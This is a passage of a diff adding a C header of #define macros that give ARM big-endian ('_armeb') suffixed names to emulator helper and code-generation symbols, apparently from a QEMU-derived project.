gen_helper_usub8 gen_helper_usub8_armeb +#define gen_helper_usubaddx gen_helper_usubaddx_armeb +#define gen_helper_uxtb16 gen_helper_uxtb16_armeb +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_armeb +#define gen_helper_v7m_msr gen_helper_v7m_msr_armeb +#define gen_helper_vfp_absd gen_helper_vfp_absd_armeb +#define gen_helper_vfp_abss gen_helper_vfp_abss_armeb +#define gen_helper_vfp_addd gen_helper_vfp_addd_armeb +#define gen_helper_vfp_adds gen_helper_vfp_adds_armeb +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_armeb +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_armeb +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_armeb +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_armeb +#define gen_helper_vfp_divd gen_helper_vfp_divd_armeb +#define gen_helper_vfp_divs gen_helper_vfp_divs_armeb +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_armeb +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_armeb +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_armeb +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_armeb +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_armeb +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_armeb +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_armeb +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_armeb +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_armeb +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_armeb +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_armeb +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_armeb +#define gen_helper_vfp_mins gen_helper_vfp_mins_armeb +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_armeb +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_armeb +#define gen_helper_vfp_muld gen_helper_vfp_muld_armeb +#define gen_helper_vfp_muls gen_helper_vfp_muls_armeb +#define gen_helper_vfp_negd gen_helper_vfp_negd_armeb +#define gen_helper_vfp_negs gen_helper_vfp_negs_armeb +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_armeb +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_armeb +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_armeb +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_armeb +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_armeb +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_armeb +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_armeb +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_armeb +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_armeb +#define gen_helper_vfp_subd gen_helper_vfp_subd_armeb +#define gen_helper_vfp_subs gen_helper_vfp_subs_armeb +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_armeb +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_armeb +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_armeb +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_armeb +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_armeb +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_armeb +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_armeb +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_armeb +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_armeb +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_armeb +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_armeb +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_armeb +#define gen_helper_vfp_touid gen_helper_vfp_touid_armeb +#define gen_helper_vfp_touis gen_helper_vfp_touis_armeb +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_armeb +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_armeb +#define gen_helper_vfp_tould gen_helper_vfp_tould_armeb +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_armeb +#define gen_helper_vfp_touls gen_helper_vfp_touls_armeb +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_armeb +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_armeb +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_armeb +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_armeb +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_armeb +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_armeb +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_armeb +#define gen_helper_wfe gen_helper_wfe_armeb +#define gen_helper_wfi gen_helper_wfi_armeb +#define gen_hvc gen_hvc_armeb +#define gen_intermediate_code_internal gen_intermediate_code_internal_armeb +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_armeb +#define gen_iwmmxt_address gen_iwmmxt_address_armeb +#define gen_iwmmxt_shift gen_iwmmxt_shift_armeb +#define gen_jmp gen_jmp_armeb +#define gen_load_and_replicate gen_load_and_replicate_armeb +#define gen_load_exclusive gen_load_exclusive_armeb +#define gen_logic_CC gen_logic_CC_armeb +#define gen_logicq_cc gen_logicq_cc_armeb +#define gen_lookup_tb gen_lookup_tb_armeb +#define gen_mov_F0_vreg gen_mov_F0_vreg_armeb +#define gen_mov_F1_vreg gen_mov_F1_vreg_armeb +#define gen_mov_vreg_F0 gen_mov_vreg_F0_armeb +#define gen_muls_i64_i32 gen_muls_i64_i32_armeb +#define gen_mulu_i64_i32 gen_mulu_i64_i32_armeb +#define gen_mulxy gen_mulxy_armeb +#define gen_neon_add gen_neon_add_armeb +#define gen_neon_addl gen_neon_addl_armeb +#define gen_neon_addl_saturate gen_neon_addl_saturate_armeb +#define gen_neon_bsl gen_neon_bsl_armeb +#define gen_neon_dup_high16 gen_neon_dup_high16_armeb +#define gen_neon_dup_low16 gen_neon_dup_low16_armeb +#define gen_neon_dup_u8 gen_neon_dup_u8_armeb +#define gen_neon_mull gen_neon_mull_armeb +#define gen_neon_narrow gen_neon_narrow_armeb +#define gen_neon_narrow_op gen_neon_narrow_op_armeb +#define gen_neon_narrow_sats gen_neon_narrow_sats_armeb +#define gen_neon_narrow_satu gen_neon_narrow_satu_armeb +#define gen_neon_negl gen_neon_negl_armeb +#define gen_neon_rsb gen_neon_rsb_armeb +#define gen_neon_shift_narrow gen_neon_shift_narrow_armeb +#define gen_neon_subl gen_neon_subl_armeb +#define gen_neon_trn_u16 gen_neon_trn_u16_armeb +#define gen_neon_trn_u8 gen_neon_trn_u8_armeb +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_armeb +#define gen_neon_unzip gen_neon_unzip_armeb +#define gen_neon_widen gen_neon_widen_armeb +#define gen_neon_zip gen_neon_zip_armeb +#define gen_new_label gen_new_label_armeb +#define gen_nop_hint gen_nop_hint_armeb +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_armeb +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_armeb +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_armeb +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_armeb +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_armeb +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_armeb +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_armeb +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_armeb +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_armeb +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_armeb +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_armeb +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_armeb +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_armeb +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_armeb +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_armeb +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_armeb +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_armeb +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_armeb +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_armeb +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_armeb +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_armeb +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_armeb +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_armeb +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_armeb +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_armeb +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_armeb +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_armeb +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_armeb +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_armeb +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_armeb +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_armeb +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_armeb +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_armeb +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_armeb +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_armeb +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_armeb +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_armeb +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_armeb +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_armeb +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_armeb +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_armeb +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_armeb +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_armeb +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_armeb +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_armeb +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_armeb +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_armeb +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_armeb +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_armeb +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_armeb +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_armeb +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_armeb +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_armeb +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_armeb +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_armeb +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_armeb +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_armeb +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_armeb +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_armeb +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_armeb +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_armeb +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_armeb +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_armeb +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_armeb +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_armeb +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_armeb +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_armeb +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_armeb +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_armeb +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_armeb +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_armeb +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_armeb +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_armeb +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_armeb +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_armeb +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_armeb +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_armeb +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_armeb +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_armeb +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_armeb +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_armeb +#define gen_rev16 gen_rev16_armeb +#define gen_revsh gen_revsh_armeb +#define gen_rfe gen_rfe_armeb +#define gen_sar gen_sar_armeb +#define gen_sbc_CC gen_sbc_CC_armeb +#define gen_sbfx gen_sbfx_armeb +#define gen_set_CF_bit31 gen_set_CF_bit31_armeb +#define gen_set_condexec gen_set_condexec_armeb +#define gen_set_cpsr gen_set_cpsr_armeb +#define gen_set_label gen_set_label_armeb +#define gen_set_pc_im gen_set_pc_im_armeb +#define gen_set_psr gen_set_psr_armeb +#define gen_set_psr_im gen_set_psr_im_armeb +#define gen_shl gen_shl_armeb +#define gen_shr gen_shr_armeb +#define gen_smc gen_smc_armeb +#define gen_smul_dual gen_smul_dual_armeb +#define gen_srs gen_srs_armeb +#define gen_ss_advance gen_ss_advance_armeb +#define gen_step_complete_exception gen_step_complete_exception_armeb +#define gen_store_exclusive gen_store_exclusive_armeb +#define gen_storeq_reg gen_storeq_reg_armeb +#define gen_sub_carry gen_sub_carry_armeb +#define gen_sub_CC gen_sub_CC_armeb +#define gen_subq_msw gen_subq_msw_armeb +#define gen_swap_half gen_swap_half_armeb +#define gen_thumb2_data_op gen_thumb2_data_op_armeb +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_armeb +#define gen_ubfx gen_ubfx_armeb +#define gen_vfp_abs gen_vfp_abs_armeb +#define gen_vfp_add gen_vfp_add_armeb +#define gen_vfp_cmp gen_vfp_cmp_armeb +#define gen_vfp_cmpe gen_vfp_cmpe_armeb +#define gen_vfp_div gen_vfp_div_armeb +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_armeb +#define gen_vfp_F1_mul gen_vfp_F1_mul_armeb +#define gen_vfp_F1_neg gen_vfp_F1_neg_armeb +#define gen_vfp_ld gen_vfp_ld_armeb +#define gen_vfp_mrs gen_vfp_mrs_armeb +#define gen_vfp_msr gen_vfp_msr_armeb +#define gen_vfp_mul gen_vfp_mul_armeb +#define gen_vfp_neg gen_vfp_neg_armeb +#define gen_vfp_shto gen_vfp_shto_armeb +#define gen_vfp_sito gen_vfp_sito_armeb +#define gen_vfp_slto gen_vfp_slto_armeb +#define gen_vfp_sqrt gen_vfp_sqrt_armeb +#define gen_vfp_st gen_vfp_st_armeb +#define gen_vfp_sub gen_vfp_sub_armeb +#define gen_vfp_tosh gen_vfp_tosh_armeb +#define gen_vfp_tosi gen_vfp_tosi_armeb +#define gen_vfp_tosiz gen_vfp_tosiz_armeb +#define gen_vfp_tosl gen_vfp_tosl_armeb +#define gen_vfp_touh gen_vfp_touh_armeb +#define gen_vfp_toui gen_vfp_toui_armeb +#define gen_vfp_touiz gen_vfp_touiz_armeb +#define gen_vfp_toul gen_vfp_toul_armeb +#define gen_vfp_uhto gen_vfp_uhto_armeb +#define gen_vfp_uito gen_vfp_uito_armeb +#define gen_vfp_ulto gen_vfp_ulto_armeb +#define get_arm_cp_reginfo get_arm_cp_reginfo_armeb +#define get_clock get_clock_armeb +#define get_clock_realtime get_clock_realtime_armeb +#define get_constraint_priority get_constraint_priority_armeb +#define get_float_exception_flags get_float_exception_flags_armeb +#define get_float_rounding_mode get_float_rounding_mode_armeb +#define get_fpstatus_ptr get_fpstatus_ptr_armeb +#define get_level1_table_address get_level1_table_address_armeb +#define get_mem_index get_mem_index_armeb +#define get_next_param_value get_next_param_value_armeb +#define get_opt_name get_opt_name_armeb +#define get_opt_value get_opt_value_armeb +#define get_page_addr_code get_page_addr_code_armeb +#define get_param_value get_param_value_armeb +#define get_phys_addr get_phys_addr_armeb +#define get_phys_addr_lpae get_phys_addr_lpae_armeb +#define get_phys_addr_mpu get_phys_addr_mpu_armeb +#define get_phys_addr_v5 get_phys_addr_v5_armeb +#define get_phys_addr_v6 get_phys_addr_v6_armeb +#define get_system_memory get_system_memory_armeb +#define get_ticks_per_sec get_ticks_per_sec_armeb +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_armeb +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__armeb +#define gt_cntfrq_access gt_cntfrq_access_armeb +#define gt_cnt_read gt_cnt_read_armeb +#define gt_cnt_reset gt_cnt_reset_armeb +#define gt_counter_access gt_counter_access_armeb +#define gt_ctl_write gt_ctl_write_armeb +#define gt_cval_write gt_cval_write_armeb +#define gt_get_countervalue gt_get_countervalue_armeb +#define gt_pct_access gt_pct_access_armeb +#define gt_ptimer_access gt_ptimer_access_armeb +#define gt_recalc_timer gt_recalc_timer_armeb +#define gt_timer_access gt_timer_access_armeb +#define gt_tval_read gt_tval_read_armeb +#define gt_tval_write gt_tval_write_armeb +#define gt_vct_access gt_vct_access_armeb +#define gt_vtimer_access gt_vtimer_access_armeb +#define guest_phys_blocks_free guest_phys_blocks_free_armeb +#define guest_phys_blocks_init guest_phys_blocks_init_armeb +#define handle_vcvt handle_vcvt_armeb +#define handle_vminmaxnm handle_vminmaxnm_armeb +#define handle_vrint handle_vrint_armeb +#define handle_vsel handle_vsel_armeb +#define has_help_option has_help_option_armeb +#define have_bmi1 have_bmi1_armeb +#define have_bmi2 have_bmi2_armeb +#define hcr_write hcr_write_armeb +#define helper_access_check_cp_reg helper_access_check_cp_reg_armeb +#define helper_add_saturate helper_add_saturate_armeb +#define helper_add_setq helper_add_setq_armeb +#define helper_add_usaturate helper_add_usaturate_armeb +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_armeb +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_armeb +#define helper_be_ldq_mmu helper_be_ldq_mmu_armeb +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_armeb +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_armeb +#define helper_be_ldul_mmu helper_be_ldul_mmu_armeb +#define helper_be_lduw_mmu helper_be_lduw_mmu_armeb +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_armeb +#define helper_be_stl_mmu helper_be_stl_mmu_armeb +#define helper_be_stq_mmu helper_be_stq_mmu_armeb +#define helper_be_stw_mmu helper_be_stw_mmu_armeb +#define helper_clear_pstate_ss helper_clear_pstate_ss_armeb +#define helper_clz_arm helper_clz_arm_armeb +#define helper_cpsr_read helper_cpsr_read_armeb +#define helper_cpsr_write helper_cpsr_write_armeb +#define helper_crc32_arm helper_crc32_arm_armeb +#define helper_crc32c helper_crc32c_armeb +#define helper_crypto_aese helper_crypto_aese_armeb +#define helper_crypto_aesmc helper_crypto_aesmc_armeb +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_armeb +#define helper_crypto_sha1h helper_crypto_sha1h_armeb +#define helper_crypto_sha1su1 helper_crypto_sha1su1_armeb +#define helper_crypto_sha256h helper_crypto_sha256h_armeb +#define helper_crypto_sha256h2 helper_crypto_sha256h2_armeb +#define helper_crypto_sha256su0 helper_crypto_sha256su0_armeb +#define helper_crypto_sha256su1 helper_crypto_sha256su1_armeb +#define helper_dc_zva helper_dc_zva_armeb +#define helper_double_saturate helper_double_saturate_armeb +#define helper_exception_internal helper_exception_internal_armeb +#define helper_exception_return helper_exception_return_armeb +#define helper_exception_with_syndrome helper_exception_with_syndrome_armeb +#define helper_get_cp_reg helper_get_cp_reg_armeb +#define helper_get_cp_reg64 helper_get_cp_reg64_armeb +#define helper_get_r13_banked helper_get_r13_banked_armeb +#define helper_get_user_reg helper_get_user_reg_armeb +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_armeb +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_armeb +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_armeb +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_armeb +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_armeb +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_armeb +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_armeb +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_armeb +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_armeb +#define helper_iwmmxt_addub helper_iwmmxt_addub_armeb +#define helper_iwmmxt_addul helper_iwmmxt_addul_armeb +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_armeb +#define helper_iwmmxt_align helper_iwmmxt_align_armeb +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_armeb +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_armeb +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_armeb +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_armeb +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_armeb +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_armeb +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_armeb +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_armeb +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_armeb +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_armeb +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_armeb +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_armeb +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_armeb +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_armeb +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_armeb +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_armeb +#define helper_iwmmxt_insr helper_iwmmxt_insr_armeb +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_armeb +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_armeb +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_armeb +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_armeb +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_armeb +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_armeb +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_armeb +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_armeb +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_armeb +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_armeb +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_armeb +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_armeb +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_armeb +#define helper_iwmmxt_minub helper_iwmmxt_minub_armeb +#define helper_iwmmxt_minul helper_iwmmxt_minul_armeb +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_armeb +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_armeb +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_armeb +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_armeb +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_armeb +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_armeb +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_armeb +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_armeb +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_armeb +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_armeb +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_armeb +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_armeb +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_armeb +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_armeb +#define helper_iwmmxt_packul helper_iwmmxt_packul_armeb +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_armeb +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_armeb +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_armeb +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_armeb +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_armeb +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_armeb +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_armeb +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_armeb +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_armeb +#define helper_iwmmxt_slll helper_iwmmxt_slll_armeb +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_armeb +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_armeb +#define helper_iwmmxt_sral helper_iwmmxt_sral_armeb +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_armeb +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_armeb +#define helper_iwmmxt_srll helper_iwmmxt_srll_armeb +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_armeb +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_armeb +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_armeb +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_armeb +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_armeb +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_armeb +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_armeb +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_armeb +#define helper_iwmmxt_subub helper_iwmmxt_subub_armeb +#define helper_iwmmxt_subul helper_iwmmxt_subul_armeb +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_armeb +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_armeb +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_armeb +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_armeb +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_armeb +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_armeb +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_armeb +#define helper_iwmmxt_unpackhul 